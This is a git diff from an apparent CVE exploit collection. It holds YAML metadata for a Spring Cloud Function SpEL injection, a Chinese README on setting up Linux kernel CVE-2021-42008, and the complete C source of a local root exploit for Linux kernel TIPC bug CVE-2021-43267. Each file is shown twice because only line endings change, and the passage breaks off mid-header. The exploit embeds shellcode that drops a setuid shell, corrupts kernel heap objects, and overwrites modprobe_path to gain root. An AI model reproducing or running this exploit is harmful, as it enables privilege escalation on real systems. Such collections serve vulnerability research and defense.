@@ -1,20 +1,20 @@ -id: CVE-2022-22963 -source: https://github.com/dinosn/CVE-2022-22963 -info: - name: Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 - severity: critical - description: Spring Cloud Function是基于 Spring Boot 的函数框架。由于 Spring Cloud Function 对用户输入的参数安全处理不严,未授权的攻击者可构造特定的数据包,通过特定的 HTTP 请求头进行 SpEL 表达式注入攻击,从而可执行任意的恶意 Java 代码,获取服务权限。 - scope-of-influence: Spring Cloud Function<3.1.7 - reference: - - https://github.com/dinosn/CVE-2022-22963 - - https://avd.aliyun.com/search?q=CVE-2022-22963 - - https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html - - https://github.com/spring-cloud/spring-cloud-function/commit/dc5128b80c6c04232a081458f637c81a64fa9b52 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22963 - cwe-id: CWE-94 - cnvd-id: None - kve-id: None - tags: cve2022, spring-framework, 表达式注入 +id: CVE-2022-22963 +source: https://github.com/dinosn/CVE-2022-22963 +info: + name: Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 + severity: critical + description: Spring Cloud Function是基于 Spring Boot 的函数框架。由于 Spring Cloud Function 对用户输入的参数安全处理不严,未授权的攻击者可构造特定的数据包,通过特定的 HTTP 请求头进行 SpEL 表达式注入攻击,从而可执行任意的恶意 Java 代码,获取服务权限。 + scope-of-influence: Spring Cloud Function<3.1.7 + reference: + - https://github.com/dinosn/CVE-2022-22963 + - https://avd.aliyun.com/search?q=CVE-2022-22963 + - https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html + - https://github.com/spring-cloud/spring-cloud-function/commit/dc5128b80c6c04232a081458f637c81a64fa9b52 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-94 + cnvd-id: None + kve-id: None + tags: cve2022, spring-framework, 表达式注入 
diff --git a/cve/linux-kernel/2021/CVE-2021-42008/README.md b/cve/linux-kernel/2021/CVE-2021-42008/README.md index 9d3bcccfc65bcd44317be09581786adfb1c732ba..31dc9683d9d2aa14d4aff717f7a12259accff357 100644 --- a/cve/linux-kernel/2021/CVE-2021-42008/README.md +++ b/cve/linux-kernel/2021/CVE-2021-42008/README.md 
@@ -1,30 +1,30 @@ -# CVE-2021-42008 - -## 漏洞描述 -drivers/net/hamradio/6pack.c中 decode_data() 函数存在越界写漏洞,用户需具备 CAP_NET_ADMIN 权限。sixpack_decode() 可多次调用 decode_data() ,对输入进行解码并保存到 sixpack->cooked_buf ,sixpack->rx_count_cooked成员充当访问 sixpack->cooked_buf 的下标,确定写入解码字节的目标偏移。问题是如果多次调用decode_data(),rx_count_cooked就会一直递增,直到超过 cooked_buf 的长度(400字节),导致越界写。 - -## 测试环境配置 -Linux-v5.13.12 测试环境见`env/` - -原exp作者测试环境为 Debian 11 - Kernel 5.10.0-8-amd64,如果适配其他版本,需修改 sp->cooked_buf 和下一个对象的距离。 - -编译选项:CONFIG_6PACK=y CONFIG_AX25=y - -在编译时将.config中的CONFIG_E1000和CONFIG_E1000E,变更为=y。 - -本文exp用到了userfaultfd,但5.11版本开始限制了用户对userfaultfd的使用,所以需根据 first patch 和 second patch 补丁进行回退(去掉SYSCALL_DEFINE1(userfaultfd, int, flags) 函数开头的权限判断语句即可)。 - -```bash -$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-5.13.12.tar.xz -$ tar -xvf linux-5.13.12.tar.xz -# KASAN: 设置 make menuconfig 设置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"。 -$ make -j32 -$ make all -$ make modules -# 编译出的bzImage目录:/arch/x86/boot/bzImage。 -``` - -## 保护机制 -KASLR / SMEP / SMAP / PTI。开启 CONFIG_SLAB_FREELIST_RANDOM / CONFIG_SLAB_FREELIST_HARDENED / CONFIG_HARDENED_USERCOPY - +# CVE-2021-42008 + +## 漏洞描述 +drivers/net/hamradio/6pack.c中 decode_data() 函数存在越界写漏洞,用户需具备 CAP_NET_ADMIN 权限。sixpack_decode() 可多次调用 decode_data() ,对输入进行解码并保存到 sixpack->cooked_buf ,sixpack->rx_count_cooked成员充当访问 sixpack->cooked_buf 的下标,确定写入解码字节的目标偏移。问题是如果多次调用decode_data(),rx_count_cooked就会一直递增,直到超过 cooked_buf 的长度(400字节),导致越界写。 + +## 测试环境配置 +Linux-v5.13.12 测试环境见`env/` + +原exp作者测试环境为 Debian 11 - Kernel 5.10.0-8-amd64,如果适配其他版本,需修改 sp->cooked_buf 和下一个对象的距离。 + +编译选项:CONFIG_6PACK=y CONFIG_AX25=y + +在编译时将.config中的CONFIG_E1000和CONFIG_E1000E,变更为=y。 + +本文exp用到了userfaultfd,但5.11版本开始限制了用户对userfaultfd的使用,所以需根据 first patch 和 second patch 补丁进行回退(去掉SYSCALL_DEFINE1(userfaultfd, int, flags) 函数开头的权限判断语句即可)。 + +```bash +$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-5.13.12.tar.xz +$ tar -xvf linux-5.13.12.tar.xz +# KASAN: 设置 make 
menuconfig 设置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"。 +$ make -j32 +$ make all +$ make modules +# 编译出的bzImage目录:/arch/x86/boot/bzImage。 +``` + +## 保护机制 +KASLR / SMEP / SMAP / PTI。开启 CONFIG_SLAB_FREELIST_RANDOM / CONFIG_SLAB_FREELIST_HARDENED / CONFIG_HARDENED_USERCOPY + 引用自[bsauce](https://www.jianshu.com/p/d4d2874ed356) \ No newline at end of file diff --git a/cve/linux-kernel/2021/CVE-2021-43267/exploit.c b/cve/linux-kernel/2021/CVE-2021-43267/exploit.c index c8793f63fbdb51632fcc5d6cb0410ef5eda63cec..15558149954ebd29a0a1f6f0d16644a196e03eae 100644 --- a/cve/linux-kernel/2021/CVE-2021-43267/exploit.c +++ b/cve/linux-kernel/2021/CVE-2021-43267/exploit.c 
@@ -1,749 +1,749 @@ -/* - * Local PoC exploit for CVE-2021-43267 [1] - * - * I want to see someone make a remote exploit for this. - * - * Only really tested on my local copy of 5.15. But given that you need the - * TIPC module loaded it is unlikely scriptkiddies will have a use for this. - * - * Exploit is a bit CTF quality. Feel free to send me revised copies. - * - * Enjoy! - * - * [1] https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow- - * allows-arbitrary-code-execution/ - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -// these are offsets for my kernel, not yours -#define PTM_UNIX98_OPS 0x127f840 // \__ no exported syms, look for xref to str -#define PTS_UNIX98_OPS 0x127f960 // / `Couldn't allocate Unix98 ptm driver` -#define MODPROBE_PATH 0x16500E0 // has symbol -#define GADGET_WRITE32 0x2c51f5 // 31 c0 48 89 32 c3 -#define GADGET_RET 0x2c51fa // c3 - -// good numbers -#define KEY_SIZE 956 -#define MSG_COUNT 2048 -#define BODY_SIZE 976 -#define SMASH_SIZE 32 -#define TRIES_MAX 8 -#define NEXT_OFFSET 0x8000 - -// some constants -#define NODE_ID 0x11223344 -#define MTYPE 0xAB /* Ac1db34v3rz */ -#define SPRAY_TTY_CNT 0x40 -#define TTY_MAGIC 0x5401 -#define TIPC_UDP_PORT 6118 -#define MSG_COPY 040000 - -// TIPC crap -#define TIPC_VERSION 2 - -// user messages -#define LINK_PROTOCOL 7 -#define LINK_CONFIG 13 - -// message types -#define STATE_MSG 0 -#define RESET_MSG 1 -#define ACTIVATE_MSG 2 -#define MSG_CRYPTO 14 - -// media types -#define MEDIA_TYPE_UDP 3 - -// w0 -#define hdr_msg_size(v) ((v) & 0x1ffff) -#define hdr_size(v) ((v & 0xf) << 21) -#define hdr_user(v) ((v & 0xf) << 25) -#define hdr_nonseq(v) ((v & 1) << 20) -#define hdr_version(v) ((v & 7) << 29) - -// w1 -#define hdr_msg_type(v) ((v & 7) << 29) - -// w2 -#define hdr_link_level_seq(v) (v & 0xffff) - -// w4 -#define hdr_next_send_pkt(v) (v & 0xffff) - -// w5 -#define 
hdr_media_id(v) (v & 0xff) -#define hdr_session_number(v) ((v & 0xffff) << 16) - -// prototypes -struct message_t { - long type; - uint8_t body[BODY_SIZE]; -}; - -// globals -int g_sockfd = 0; -struct sockaddr_in g_sockaddr; - -// utility -#define info(fmt, args...) report('$', false, fmt, ## args) -#define infov(fmt, args...) report('~', false, fmt, ## args) -#define maybe(fmt, args...) report('?', false, fmt, ## args) -#define fatal(fmt, args...) report('!', true, fmt, ## args) -#define info_value64(name, value) infov("%-24s: %016lx", name, value) - -void report(char indicator, bool error, const char *fmt, ...) { - FILE *stream = (error) ? stderr : stdout; - va_list a; - va_start(a, fmt); - fprintf(stream, "[%c] %s", indicator, (error) ? "ERROR: " : ""); - vfprintf(stream, fmt, a); - fprintf(stream, "\n"); - va_end(a); - - if (error) { - exit(-1); // all errors are fatal - } -} - -void usage(char *prog) { - printf("usage: %s \n\n", prog); -} - -static inline void write64(uint8_t *p, uint64_t v) { - *(uint64_t*)(p) = v; -} - -static inline uint64_t read64(uint8_t *p) { - return *(uint64_t*)(p); -} - -#define be32 htonl - -// netlink -int netlink_send( - uint16_t type, uint16_t flags, uint32_t seq, - uint8_t* pkt, size_t pkt_len, - uint8_t **reply_buf, size_t *reply_sz -) { - int sock_fd; - struct sockaddr_nl sa; - memset(&sa, 0, sizeof(struct sockaddr_nl)); - sa.nl_family = AF_NETLINK; - - size_t pkt_full_len = sizeof(struct nlmsghdr) + pkt_len; - uint8_t *pkt_full = malloc(pkt_full_len); - memset(pkt_full, 0, pkt_full_len); - memcpy(pkt_full + sizeof(struct nlmsghdr), pkt, pkt_len); - - struct nlmsghdr *netlink_hdr = (struct nlmsghdr*)(pkt_full); - netlink_hdr->nlmsg_len = pkt_full_len; - netlink_hdr->nlmsg_type = type; - netlink_hdr->nlmsg_flags = flags; - netlink_hdr->nlmsg_seq = seq; - netlink_hdr->nlmsg_pid = getpid(); - - if ((sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_GENERIC)) < 0) { - perror("socket"); - return -1; - } - - if (bind(sock_fd, (struct 
sockaddr*)&sa, sizeof(sa)) < 0) { - perror("bind"); - return -1; - } - - ssize_t r = sendto( - sock_fd, pkt_full, pkt_full_len, 0, - (struct sockaddr*)&sa, sizeof(struct sockaddr_nl) - ); - - if (r < 0) { - perror("sendto"); - return -1; - } - - free(pkt_full); - - if (reply_buf != NULL) { - struct msghdr m; - memset(&m, 0, sizeof(struct msghdr)); - m.msg_iovlen = 1; - m.msg_iov = malloc(sizeof(struct iovec)); - m.msg_iov->iov_base = malloc(0x1000); - m.msg_iov->iov_len = 0x1000; - - size_t nread; - - if ((nread = recvmsg(sock_fd, &m, 0)) < 0) { - goto error; - } - - if (m.msg_iovlen != 1) { - goto error; - } - - *reply_sz = nread; - *reply_buf = malloc(*reply_sz); - memcpy(*reply_buf, m.msg_iov->iov_base, *reply_sz); - free(m.msg_iov->iov_base); - } - - close(sock_fd); - return 0; - -error: - close(sock_fd); - return -1; -} - -int netlink_enable_tipc_udp(char *str_ip_address) { - uint8_t pkt_ctrl[]={ - 0x03, 0x01, 0x00, 0x00, 0x06, 0x00, 0x01, 0x00, - 0x10, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x02, 0x00, - 0x54, 0x49, 0x50, 0x43, 0x76, 0x32, 0x00, 0x00 - }; - - uint8_t *nl_reply; - size_t nl_reply_len = 0; - uint32_t ip_addr; - uint32_t seq; - int r; - - seq = time(NULL); - - ip_addr = inet_addr(str_ip_address); - if (ip_addr == INADDR_NONE) { - fatal("invalid ip address given"); - } - - r = netlink_send( - NLMSG_MIN_TYPE, (NLM_F_REQUEST | NLM_F_ACK), seq, - pkt_ctrl, sizeof(pkt_ctrl), &nl_reply, &nl_reply_len - ); - - if(r < 0) { - fatal("failed to send netlink control message."); - } - - if (nl_reply_len == 0) { - fatal("did not get netlink control message reply."); - } - - if (*(uint32_t*)(nl_reply + 0x10) == 0xfffffffe) { - fatal("tipc support not available."); - } - - uint16_t nlmsg_type = 0; - off_t pos = 0x14; - - while(pos < nl_reply_len - 4) { - struct nlattr *attr = (struct nlattr*)(nl_reply + pos); - if (attr->nla_type == 1) { - nlmsg_type = *(uint16_t*)(nl_reply + pos + 4); - break; - } - pos += attr->nla_len; - if ((attr->nla_len % 4) != 0) { - pos += 4 - 
(attr->nla_len % 4); - } - } - - if (nlmsg_type == 0) { - fatal("could not find tipc netlink message type."); - } - - uint8_t pkt_tipc_enable_udp[]={ - 0x03, 0x01, 0x00, 0x00, 0x40, 0x00, 0x01, 0x80, - 0x0d, 0x00, 0x01, 0x00, 0x75, 0x64, 0x70, 0x3a, - 0x55, 0x44, 0x50, 0x31, 0x00, 0x00, 0x00, 0x00, - 0x2c, 0x00, 0x04, 0x80, 0x14, 0x00, 0x01, 0x00, - 0x02, 0x00, 0x17, 0xe6, 0x00, 0x00, 0x00, 0x00, // <-- +0x24 = ip - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x14, 0x00, 0x02, 0x00, 0x02, 0x00, 0x17, 0xe6, - 0xe4, 0x00, 0x12, 0x67, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00 - }; - - *(uint32_t*)(pkt_tipc_enable_udp + 0x24) = ip_addr; - - r = netlink_send( - nlmsg_type, (NLM_F_REQUEST | NLM_F_ACK), seq, - pkt_tipc_enable_udp, sizeof(pkt_tipc_enable_udp), NULL, NULL - ); - - if (r < 0) { - fatal("failed to send netlink tipc udp enable message."); - } - - // the right way is to read back a netlink reply and check if this worked.. - // I chose to go with the scientifically proven method of big chillin' - sleep(2); - - return 0; -} - -// tipc packet routines -void gen_tipc_hdr( - uint8_t *o, - uint32_t w0, uint32_t w1, uint32_t w2, - uint32_t w3, uint32_t w4, uint32_t w5 -) { - uint32_t* o32 = (uint32_t*)o; - o32[0] = be32(w0); - o32[1] = be32(w1); - o32[2] = be32(w2); - o32[3] = be32(w3); - o32[4] = be32(w4); - o32[5] = be32(w5); -} - -ssize_t tipc_send(uint8_t *buf, size_t sz) { - return sendto( - g_sockfd, buf, sz, 0, (struct sockaddr*)&g_sockaddr, sizeof(g_sockaddr) - ); -} - -void tipc_discover() { - uint32_t w0, w1, w2, w3, w4, w5; - uint8_t pkt[24]; - w0 = 0; - w0 |= hdr_version(TIPC_VERSION); - w0 |= hdr_size(6); - w0 |= hdr_msg_size(24); - w0 |= hdr_user(LINK_CONFIG); - w0 |= hdr_nonseq(1); - w1 = 0; - w2 = 0; - w3 = NODE_ID; - w4 = 0x1267; - w5 = hdr_media_id(MEDIA_TYPE_UDP); - gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); - tipc_send(pkt, sizeof(pkt)); -} - -void tipc_link_state_a(uint32_t ip) { - uint8_t pkt[56]; - uint32_t *body = (uint32_t*)(pkt + 
24); - uint32_t w0, w1, w2, w3, w4, w5; - - memset(pkt, 0, sizeof(pkt)); - - w0 = hdr_version(TIPC_VERSION); - w0 |= hdr_size(10); - w0 |= hdr_user(LINK_PROTOCOL); - w0 |= hdr_msg_size(56); - w1 = hdr_msg_type(RESET_MSG); - w2 = hdr_link_level_seq(0x8000); - w3 = NODE_ID; - w4 = hdr_next_send_pkt(1); - w5 = hdr_session_number(50388); - gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); - - int pos = 0; - body[pos++] = be32(NODE_ID); - body[pos++] = be32(ip); - body[pos++] = 0; - body[pos++] = be32(3500 << 16); - memcpy(body + 4, "UDP1", 4); - tipc_send(pkt, sizeof(pkt)); -} - -void tipc_link_state_b(uint32_t ip) { - uint8_t pkt[44]; - uint32_t w0, w1, w2, w3, w4, w5; - uint32_t *body = (uint32_t*)(pkt + 24); - - memset(pkt, 0, sizeof(pkt)); - - w0 = hdr_version(TIPC_VERSION); - w0 |= hdr_size(10); - w0 |= hdr_user(LINK_PROTOCOL); - w0 |= hdr_msg_size(44); - w1 = hdr_msg_type(STATE_MSG); - w2 = hdr_link_level_seq(1); - w3 = NODE_ID; - w4 = hdr_next_send_pkt(1); - w5 = hdr_session_number(50388); - - gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); - - int pos = 0; - body[pos++] = be32(NODE_ID); - body[pos++] = be32(ip); - body[pos++] = 0; // timestamp - body[pos++] = 0; // max pkt/link tolerance - body[pos++] = 0; // bearer instance - tipc_send(pkt, sizeof(pkt)); -} - -int tipc_link_setup(char *host) { - if ((g_sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { - perror("socket"); - return -1; - } - - memset((char *) &g_sockaddr, 0, sizeof(g_sockaddr)); - g_sockaddr.sin_family = AF_INET; - g_sockaddr.sin_port = htons(TIPC_UDP_PORT); - - if (inet_aton(host, &g_sockaddr.sin_addr) == 0) { - perror("inet_aton"); - return -1; - } - - tipc_discover(); - tipc_link_state_a(be32(inet_addr(host))); - tipc_link_state_b(be32(inet_addr(host))); - - return 0; -} - -void tipc_trigger(uint8_t *smashbuf, uint32_t smashlen, int seqno) { - uint8_t pkt[0x1000]; - uint32_t w0, w1, w2, w3, w4, w5; - - w0 = hdr_version(TIPC_VERSION); - w0 |= hdr_size(6); - w0 |= hdr_user(MSG_CRYPTO); - w0 |= 
hdr_msg_size(24 + 36 + KEY_SIZE); - w1 = 0; - w2 = seqno; - w3 = NODE_ID; - w4 = 0; - w5 = 0; - - memset(pkt, 0, sizeof(pkt)); - gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); - - memcpy(pkt+24, "HAXX", 4); - *(uint32_t*)(pkt+24+32) = be32(KEY_SIZE + SMASH_SIZE + smashlen); - memset(pkt+24+36, 'C', KEY_SIZE); - memset(pkt+24+36+KEY_SIZE, 'D', SMASH_SIZE); - memcpy(pkt+24+36+KEY_SIZE + SMASH_SIZE, smashbuf, smashlen); - tipc_send(pkt, sizeof(pkt)); -} - -int setup_modprobe_hax() { - // small ELF file matroshka doll that does; - // fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC); - // write(fd, elfcode, elfcode_len) - // chmod("/tmp/sh", 04755) - // close(fd); - // exit(0); - // - // the dropped ELF simply does: - // setuid(0); - // setgid(0); - // execve("/bin/sh", ["/bin/sh", NULL], [NULL]); - unsigned char elfcode[] = { - 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, - 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02, - 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, - 0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, - 0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f, - 0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, - 0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 
0x09, 0x00, 0x00, - 0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, - 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d, - 0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, - 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, - 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, - 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, - 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69, - 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a, - 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00, - 0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0, - 0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, - 0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00 - }; - - FILE *fp; - - fp = fopen("/tmp/benign", "wb"); - if (fp == NULL) { - perror("fopen"); - return -1; - } - - if (fwrite("\xff\xff\xff\xff", 4, 1, fp) < 1) { - perror("fwrite"); - return -1; - } - fclose(fp); - - fp = fopen("/tmp/hax", "wb"); - if (fp == NULL) { - perror("fopen"); - return -1; - } - - if (fwrite(elfcode, sizeof(elfcode), 1, fp) < 1) { - perror("fwrite"); - return -1; - } - fclose(fp); - - if (chmod("/tmp/benign", 0777) < 0) { - perror("chmod"); - return -1; - } - - if (chmod("/tmp/hax", 0777) < 0) { - perror("chmod"); - return -1; - } - - return 0; -} - -int main(int argc, char *argv[]) { - uint64_t pty_ops = 0; - uint64_t 
mybuf = 0; - uint64_t kernel_base = 0; - - uint8_t fake_tty[0x20]; - uint8_t peekbuf[0x2000]; - - int peek_cnt = 1; - int seqno=0; - - int tty_fds[SPRAY_TTY_CNT]; - int queue_id[MSG_COUNT]; - int queue_id_final = 0; - - struct message_t dummy; - dummy.type = MTYPE; - memset(dummy.body, 0x58, BODY_SIZE); - - fprintf(stdout, - "\n" - " $$$ Linux 5.10-5.15 CVE-2021-43267 exploit $$$\n" - " -- by blasty --\n\n" - ); - - if (argc != 2) { - usage(argv[0]); - return -1; - } - - info("enabling tipc udp media"); - if (netlink_enable_tipc_udp(argv[1]) < 0) { - fatal("failed to enable tipc udp media"); - } - - info("establish tipc link"); - if (tipc_link_setup(argv[1]) < 0) { - fatal("failed to establish tipc link"); - } - - info("installing helpers"); - if (setup_modprobe_hax() < 0) { - fatal("failed to setup helpers"); - } - - info("create messages queues"); - if ((queue_id_final = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) { - perror("msgget"); - fatal("failed to create message queue"); - } - - for(int i = 0; i < MSG_COUNT; i++) { - if ((queue_id[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) { - perror("msgget"); - fatal("failed to create message queue %d", i); - } - } - - info("spray messages"); - for(int i = 0; i < MSG_COUNT; i++) { - if (msgsnd(queue_id[i], (void*)&dummy, BODY_SIZE, 0) < 0) { - perror("msgsnd"); - fatal("failed to create message in queue %d", i); - } - } - - info("poking holes"); - for(int i = 0; i < MSG_COUNT; i += 2) { - if(msgrcv(queue_id[i], (void*)&dummy, BODY_SIZE, MTYPE, 0) < 0) { - perror("msgrcv"); - fatal("failed to peek message in queue %d", i); - } - } - - info("tipc bug trigger"); - - uint64_t hacked_msg[4]={ - 0, // m_list.prev - 0, // m_list.next - MTYPE, // m_type - 0x2000, // m_ts - }; - - tipc_trigger((uint8_t*)hacked_msg, 0x20, ++seqno); - - info("spraying tty_struct\n"); - for(int i = 0; i < SPRAY_TTY_CNT; i++) { - if ((tty_fds[i] = open("/dev/ptmx", O_RDWR|O_NOCTTY)) < 0) { - fatal("failed to spray tty_struct %d/%d", i, 
MSG_COUNT); - } - } - - for(int i = MSG_COUNT-1; i > 0; i--, peek_cnt++) { - int r = msgrcv( - queue_id[i], (void*)peekbuf, 0x2000, 0, MSG_COPY | IPC_NOWAIT - ); - - if (r < 0 || r == BODY_SIZE) { - continue; - } - - info("we corrupted a msg_msg size field! (took %d peeks)\n", peek_cnt); - - for(int j = 0; j < r; j += 4) { - if (*(uint32_t*)(peekbuf + j) != TTY_MAGIC) { - continue; - } - - info("found tty_struct at offset 0x%x", j); - pty_ops = read64(peekbuf + j + 0x18); - mybuf = read64(peekbuf + j + 0x40) - 0x408; - - info_value64("pty_ops", pty_ops); - info_value64("our buffer", mybuf); - - memcpy(fake_tty, peekbuf + j, 0x20); - write64(fake_tty + 0x18, mybuf + NEXT_OFFSET); - - // did we hit a master of slave ops ptr? - switch(pty_ops & 0xfff) { - case PTM_UNIX98_OPS & 0xfff: - kernel_base = pty_ops - PTM_UNIX98_OPS; - break; - - case PTS_UNIX98_OPS & 0xfff: - kernel_base = pty_ops - PTS_UNIX98_OPS; - break; - - default: - fatal("this should never happen tbh"); - break; - } - - info_value64("kernel base", kernel_base); - break; - } - - if (pty_ops != 0) { - break; - } else { - info("too bad, tty_struct didnt follow corrupted msg_msg."); - } - } - - if (pty_ops == 0) { - for(int i =0; i < SPRAY_TTY_CNT; i++) { - close(tty_fds[i]); - } - - fatal("infoleak failed. 
try again?"); - } - - info_value64("modprobe_path", kernel_base + MODPROBE_PATH); - - dummy.type = MTYPE; - for(int i = 0; i < BODY_SIZE; i+=8) { - write64(dummy.body + i, kernel_base + GADGET_RET); - } - write64(dummy.body + 0x60, kernel_base + GADGET_WRITE32); - - info("spray fake pty ops vtable"); - for(int i = 0; i < MSG_COUNT; i++) { - for(int j = 0; j < 8; j++) { - if (msgsnd(queue_id[i], (void*)&dummy, BODY_SIZE, 0) < 0) { - perror("msgsnd"); - fatal("failed to create message %d", i); - } - } - } - - int hacked = 0; - - dummy.type = MTYPE; - for(int try = 0; try < TRIES_MAX; try++) { - info("attempting to corrupt tty_struct (try %d)", try); - - if (msgsnd(queue_id_final, (void*)&dummy, BODY_SIZE, 0) < 0) { - perror("msgsnd"); - fatal("failed to create message"); - } - - if ((tty_fds[0] = open("/dev/ptmx", O_RDWR|O_NOCTTY)) < 0) { - fatal("failed to alloc tty_struct"); - } - - if(msgrcv(queue_id_final, (void*)&dummy, BODY_SIZE, MTYPE, 0) < 0) { - perror("msgrcv"); - fatal("failed to receive message"); - } - - tipc_trigger(fake_tty, 0x20, ++seqno); - - int r = 0; - r = ioctl(tty_fds[0], 0x706d742f, kernel_base + MODPROBE_PATH); - if (r == 0) { - info("maybe I have some good news.."); - r = ioctl(tty_fds[0], 0x7861682f, kernel_base + MODPROBE_PATH + 4); - hacked = 1; - break; - } else { - close(tty_fds[0]); - } - } - - if (!hacked) { - fatal("hacking computer failed."); - } - - info("triggering modprobe\n"); - system("/tmp/benign"); - sleep(1); - - info("popping shell\n"); - system("/tmp/sh"); - - for(int j = 0; j < SPRAY_TTY_CNT; j++) { - close(tty_fds[j]); - } - - return 0; +/* + * Local PoC exploit for CVE-2021-43267 [1] + * + * I want to see someone make a remote exploit for this. + * + * Only really tested on my local copy of 5.15. But given that you need the + * TIPC module loaded it is unlikely scriptkiddies will have a use for this. + * + * Exploit is a bit CTF quality. Feel free to send me revised copies. + * + * Enjoy! 
